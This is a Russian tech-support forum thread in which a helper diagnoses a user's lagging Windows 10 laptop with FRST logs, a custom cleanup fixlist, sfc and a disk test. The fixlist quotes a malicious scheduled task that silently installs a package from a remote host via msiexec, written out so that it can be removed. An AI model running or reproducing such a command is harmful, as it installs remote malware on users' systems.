Технический форум
Вернуться   Технический форум > Компьютерный форум > Форум по вирусам и антивирусам > Безопасность


Ответ
 
Опции темы Опции просмотра
Старый 06.03.2019, 20:19   #1 (permalink)
4o_kavo
Member
 
Регистрация: 14.08.2015
Сообщений: 263
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 0
По умолчанию Проверьте лог, Лаги на буке

Всем привет.
Дело в том, что уже давно началась проблема с играми, те игры, которые шли раньше xорошо, сейчас идут и очень лагают, пытался чистить, пытался даже как то переустановить win 10 проблема осталась, не понимаю вообще почему так, выложу лог может что то найдется в нем.
Вложения
Тип файла: rar WIN-M9U1OON7OR6_2019-03-06_23-03-03.rar (1.14 Мб, 26 просмотров)
4o_kavo вне форума   Ответить с цитированием

Старый 06.03.2019, 20:19
Helpmaster
Member
 
Аватар для Helpmaster
 
Регистрация: 08.03.2016
Сообщений: 0

Пока в вашей теме нет ответов можете заняться прочтением схожих тем

dvd-rom на ноут буке не видит MP3-CD
на буке горят все индикаторы
неисправность на нет буке
Замена CPU на буке
проблемы со службами на буке

Старый 09.03.2019, 12:07   #2 (permalink)
mike 1
Helper
 
Аватар для mike 1
 
Регистрация: 28.10.2013
Адрес: Москва
Сообщений: 678
Сказал(а) спасибо: 1
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 5469
По умолчанию

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
  1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
  2. Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files".
  3. Нажмите кнопку Scan.
  4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
  5. Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
__________________
Антивирусная школа по подготовке консультантов https://safezone.cc/training (если хотите самостоятельно лечить компьютеры от вирусов)
mike 1 вне форума   Ответить с цитированием
Старый 12.03.2019, 08:24   #3 (permalink)
4o_kavo
Member
 
Регистрация: 14.08.2015
Сообщений: 263
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 0
По умолчанию

Вот два отчета
Вложения
Тип файла: txt Addition.txt (48.8 Кб, 536 просмотров)
Тип файла: txt FRST.txt (194.2 Кб, 378 просмотров)
4o_kavo вне форума   Ответить с цитированием
Старый 16.03.2019, 13:29   #4 (permalink)
mike 1
Helper
 
Аватар для mike 1
 
Регистрация: 28.10.2013
Адрес: Москва
Сообщений: 678
Сказал(а) спасибо: 1
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 5469
По умолчанию

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
  1. Временно выгрузите антивирус, файрволл и прочее защитное ПО.
  2. Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
    Код:
    CreateRestorePoint:
    CloseProcesses:
    2018-04-12 06:34 - 2018-04-12 06:34 - 000060416 ____N (Microsoft Corporation) C:\Users\Administrator\kkouAyhaYk.exe
    2019-02-24 23:23 - 2019-02-24 23:23 - 000000033 __RSH () C:\Program Files\5ce79de3.log
    2019-02-24 23:23 - 2019-02-24 23:23 - 000000033 __RSH () C:\Program Files (x86)\f5bf8f68.log
    2018-04-12 06:34 - 2018-04-12 06:34 - 000060416 ____N (Microsoft Corporation) C:\Users\Administrator\AppData\Roaming\iyIAZuiQUs.exe
    2018-04-12 06:34 - 2018-04-12 06:34 - 000178688 ____N (Microsoft Corporation) C:\Users\Administrator\AppData\Roaming\NouWialAFkeq.exe
    2019-02-24 23:32 - 2019-02-24 23:32 - 000000002 _____ () C:\Users\Administrator\AppData\Local\imw.ini
    2019-01-31 20:26 - 2019-01-31 20:26 - 000000000 _____ () C:\Users\Administrator\AppData\Local\oobelibMkey.log
    Task: {1069EBE0-E04D-44CD-B7F9-FA05CF77FAE6} - System32\Tasks\{067CED45-C798-1919-78A8-4456E3EB8195} => "msiexec" -i hxxps://empiralostwinc.org/cpcomskqnikf.knn -q <==== ATTENTION
    Task: {22C66E2A-7992-457F-8423-5E3E2CD1D329} - \Microsoft\Windows\BrokerInfrastructure\BgTaskRegistrationMaintenanceTask -> No File <==== ATTENTION
    Task: {85BCD23D-6CFB-41B2-B66C-A6FEE594FD56} - \IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 -> No File <==== ATTENTION
    Task: {D7E35A31-EC8A-4C81-849D-5FC15B346B63} - System32\Tasks\{D50C9FA9-087C-F31F-2BDC-0AE6BFFC4314} => C:\Users\Administrator\kkouAyhaYk.exe (Microsoft Windows -> Microsoft Corporation)
    zip:C:\FRST\Quarantine
  3. Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  4. Обратите внимание, что компьютер будет перезагружен.
  5. Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму
__________________
Антивирусная школа по подготовке консультантов https://safezone.cc/training (если хотите самостоятельно лечить компьютеры от вирусов)
mike 1 вне форума   Ответить с цитированием
Старый 17.03.2019, 15:12   #5 (permalink)
4o_kavo
Member
 
Регистрация: 14.08.2015
Сообщений: 263
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 0
По умолчанию

Готово, всё загрузил
Вложения
Тип файла: zip 17.03.2019_17.48.28.zip (125.8 Кб, 24 просмотров)
Тип файла: txt Fixlog.txt (4.5 Кб, 332 просмотров)
4o_kavo вне форума   Ответить с цитированием
Ads

Яндекс

Member
 
Регистрация: 31.10.2006
Сообщений: 40200
Записей в дневнике: 0
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 55070
Старый 17.03.2019, 19:17   #6 (permalink)
mike 1
Helper
 
Аватар для mike 1
 
Регистрация: 28.10.2013
Адрес: Москва
Сообщений: 678
Сказал(а) спасибо: 1
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 5469
По умолчанию

Карантин я не просил грузить на форум. Удалите карантин из вложений. Что с проблемой?
__________________
Антивирусная школа по подготовке консультантов https://safezone.cc/training (если хотите самостоятельно лечить компьютеры от вирусов)
mike 1 вне форума   Ответить с цитированием
Старый 03.04.2019, 15:36   #7 (permalink)
4o_kavo
Member
 
Регистрация: 14.08.2015
Сообщений: 263
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 0
По умолчанию

Цитата:
Сообщение от mike 1 Посмотреть сообщение
Карантин я не просил грузить на форум. Удалите карантин из вложений. Что с проблемой?
Да вроде как то всё как было, различий не заметил. А можно на наличие ошибок проверить жесткий диск? Может с ним что то?
4o_kavo вне форума   Ответить с цитированием
Старый 03.04.2019, 21:26   #8 (permalink)
Vvvyg
Member
 
Регистрация: 17.05.2011
Адрес: Тула
Сообщений: 9,826
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 9863
По умолчанию

По логам проблем с HDD не видно.

Сделайте проверку и исправление ошибок на системном разделе (через свойства).

Вставьте диск, с которого устанавливали Windows (либо другой но с той же локализацией и тем же сервис паком (SP) что установлен у вас. Если его нет- продолжайте без него.

Откройте меню "Пуск" ("Start") и в строке поиска введите "cmd". На результатах поиска нажмите правой клавишей мыши и выберите пункт "Запуск от имени администратора".

Введите sfc /scannow и нажмите Enter.
Система восстановит недостающие или изменённые системные файлы, для этого может потребоваться перезагрузка.
Vvvyg вне форума   Ответить с цитированием
Старый 04.04.2019, 11:04   #9 (permalink)
4o_kavo
Member
 
Регистрация: 14.08.2015
Сообщений: 263
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 0
По умолчанию

Цитата:
Сообщение от Vvvyg Посмотреть сообщение
По логам проблем с HDD не видно.

Сделайте проверку и исправление ошибок на системном разделе (через свойства).

Вставьте диск, с которого устанавливали Windows (либо другой но с той же локализацией и тем же сервис паком (SP) что установлен у вас. Если его нет- продолжайте без него.

Откройте меню "Пуск" ("Start") и в строке поиска введите "cmd". На результатах поиска нажмите правой клавишей мыши и выберите пункт "Запуск от имени администратора".

Введите sfc /scannow и нажмите Enter.
Система восстановит недостающие или изменённые системные файлы, для этого может потребоваться перезагрузка.
В win 10 предусмотрена полное восстановление системы без диска, типо переустновка без потери данныx, я недавно ее делал.

Но видно, что бук работает не так как раньше
4o_kavo вне форума   Ответить с цитированием
Старый 04.04.2019, 11:16   #10 (permalink)
Vvvyg
Member
 
Регистрация: 17.05.2011
Адрес: Тула
Сообщений: 9,826
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 9863
По умолчанию

Скачайте последнюю версию программы Victoria отсюда, распакуйте, запустите. На вкладке Standard выберите режим API, в списке дисков отметьте сначала системный диск, на вкладке SMART нажмите Get SMART, затем на вкладке Test выберите Read, Remap и нажмите Start.
Содержимое папки LOGS по окончании проверки упакуйте в архив и прикрепите к своему следующему сообщению.
Vvvyg вне форума   Ответить с цитированием
Ads

Яндекс

Member
 
Регистрация: 31.10.2006
Сообщений: 40200
Записей в дневнике: 0
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
Репутация: 55070
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Выкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Выкл.




Часовой пояс GMT +4, время: 17:11.

Powered by vBulletin® Version 6.2.5.
Copyright ©2000 - 2014, Jelsoft Enterprises Ltd.